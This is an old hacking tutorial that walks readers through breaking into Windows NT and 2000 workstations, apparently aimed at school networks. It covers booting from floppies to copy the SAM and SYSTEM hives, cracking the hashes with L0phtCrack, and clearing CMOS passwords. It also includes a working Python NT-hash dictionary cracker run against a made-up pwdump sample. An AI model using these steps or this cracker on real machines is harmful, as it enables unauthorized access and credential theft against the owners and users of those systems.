Now... All of us know that a lot of networks today use NT as their OS of choice, especially in schools. Some use Novell instead, but that is not much of a problem, because I will show you how to get into a Novell network in the other tutorial.

I have tried this on Windows NT 4.0 and Windows 2000 Professional (which is also Windows NT 5.0).
I am not sure whether it works the same way on Windows 2000 Advanced Server and Datacenter Server. They are built on the same NT code base, but a Windows 2000 domain controller keeps its domain accounts in Active Directory, not in the SAM, so on a domain controller the SAM file does not contain the domain accounts.

Now, an NT domain has a server called the PDC (Primary Domain Controller). The PDC authenticates domain login names and passwords against its SAM (Security Accounts Manager) database. The SAM is a registry hive that holds account names and password hashes; it does not hold the passwords themselves.

The admin creates the domain accounts on the PDC, and the PDC replicates its SAM to the BDCs (Backup Domain Controllers), if there are any, so they can answer logins too. It does not send it to the workstations. Every workstation keeps its own SAM, which holds only that machine's local accounts (the local Administrator, any local users) so that people can log in locally to the workstation.

This means the workstation's SAM is not a copy of the server's SAM: it holds the workstation's local accounts, including the local Administrator. So our objective will be retrieving that local SAM file.

If you look in the C:\Winnt\repair\ folder you will find a SAM file, but that one is only a backup copy, written at install time and refreshed only when the repair information is updated (rdisk /s on NT 4.0), so it can be stale; on NT 4.0 it is stored compressed as sam._. The live copy is C:\Winnt\system32\config\SAM. But wait, you can't open it or copy it to a disk. Why? Because the OS is using it: it holds the file open with an exclusive lock the whole time Windows is running. When you log in to the workstation, the OS (Operating System, which in this case is Windows NT) checks a local login against the workstation's own SAM, and passes a domain login to the domain controller, which checks it against the domain SAM.

So how can we get the SAM file?

Easy: we copy it from OUTSIDE Windows. That means you need to create a boot disk and make sure the workstation boots from the floppy. One caveat: a plain DOS boot disk only sees FAT partitions. If the system drive is NTFS, the boot disk has to carry a driver that can read NTFS, or you will not even see the Winnt directory.

Where can I get the Boot Disk?

Go to www.bootdisk.com and download it there. The boot disk set uses three floppy disks, since it is large.


Once the boot disks are created, put Boot Disk #1 in the drive and restart the computer. You will see it boot up by itself. Then it is going to ask you for Disk 2, and finally Disk 3.

When you get to the A: prompt, go to the directory that holds the SAM file (C:\Winnt\system32\config\ for the live copy, or the "repair" directory I showed you for the backup) and copy the SAM file to your floppy. Copy the SYSTEM file from C:\Winnt\system32\config\ as well; you will need it to read the hashes.

Now you have the SAM file!!! But... what do I use to open it? The SAM does not store passwords in the clear; for each account it stores two password hashes (an LM hash and an NT hash), and on NT 4.0 with SYSKEY enabled (SP3 and later) and on every Windows 2000 machine those hashes are encrypted again with a key derived from the SYSTEM hive, which is why you copied that file too. So you have to download a tool that dumps and cracks it.

Go to http://l0pht.com and download the SAM dump and cracking tool (L0phtCrack).

When you are done with the download, run the dump over your copy and you get the login names and their hashes. That is not the passwords yet: the cracker then has to try dictionary words and brute force against each hash. LM hashes fall quickly, because the password is uppercased and split into two 7-character halves before hashing; NT hashes are case-sensitive and take longer.
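To make concrete what the dump tool hands back and why a cracker is still needed after it, here is an added Python example (my own code, not the page's and not L0pht's) that computes NT hashes the way the SAM stores them (MD4 over the UTF-16LE password, unsalted) and runs a dictionary attack over a constructed pwdump-style dump. The account lines, usernames, RIDs and wordlist are made up; the two literal NT hashes are the well-known values for "password" and for the empty password, and the LM field holds the LM hash of an empty password. SYSKEY decryption of a raw SAM hive is not shown: the input is assumed to be hashes the dump tool has already extracted.

```python
"""NT hash computation and dictionary cracking of a pwdump-style SAM dump (example)."""
from __future__ import annotations

import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out here so the example does not depend on
    the OpenSSL build still shipping the legacy MD4 provider."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z

    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):
            a = _rotl(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl(a + g(b, c, d) + x[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl(a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash as stored in the SAM: MD4 of the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16le"))


def parse_pwdump(text: str) -> list[tuple[str, int, str, str]]:
    """Parse pwdump/L0phtCrack lines of the form user:RID:LMhash:NThash:::"""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        accounts.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return accounts


def crack_nt_hashes(dump_text: str, wordlist: list[str]) -> dict[str, str | None]:
    """Dictionary attack: hash each candidate once, then look every account's
    NT hash up in that table. Because NT hashes are unsalted, one hash per
    word covers every account in the dump, and two accounts with the same
    password show up with the same hash. Returns user -> password or None."""
    table = {nt_hash(w).hex(): w for w in wordlist}
    return {user: table.get(nt) for user, _rid, _lm, nt in parse_pwdump(dump_text)}


# Constructed sample dump (hypothetical accounts, not data from any real machine).
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
SAMPLE_DUMP = (
    f"Administrator:500:{LM_EMPTY}:8846f7eaee8fb117ad06bdd830b7586c:::\n"  # NT hash of "password"
    f"Guest:501:{LM_EMPTY}:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"          # NT hash of ""
    f"jsmith:1001:{LM_EMPTY}:{nt_hash('Correct-Horse-91').hex()}:::\n"     # not in the wordlist
)
WORDLIST = ["", "123456", "password", "letmein", "admin", "secret"]

if __name__ == "__main__":
    for user, pw in crack_nt_hashes(SAMPLE_DUMP, WORDLIST).items():
        shown = "<empty>" if pw == "" else (pw if pw is not None else "not in wordlist")
        print(f"{user:14s} {shown}")
```

The empty string is deliberately in the wordlist: an account whose NT hash is 31d6cfe0... has no password at all, which is a finding in its own right. jsmith stays uncracked until the right word is added, which is the point of the page's "dump, then crack" distinction.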


But what if the computer doesn't boot from the floppy?

Simple: go into the CMOS setup and set the boot order to floppy first, then the HDD.

But what if the CMOS setup is password protected? Simple: go to Astalavista.box.sk, search for CmosPwd by Christophe GRENIER, and read its instructions on how to clear the CMOS setup password.

And that concludes our tutorial for Windows NT.

Source:
Hackers Inc & BSRF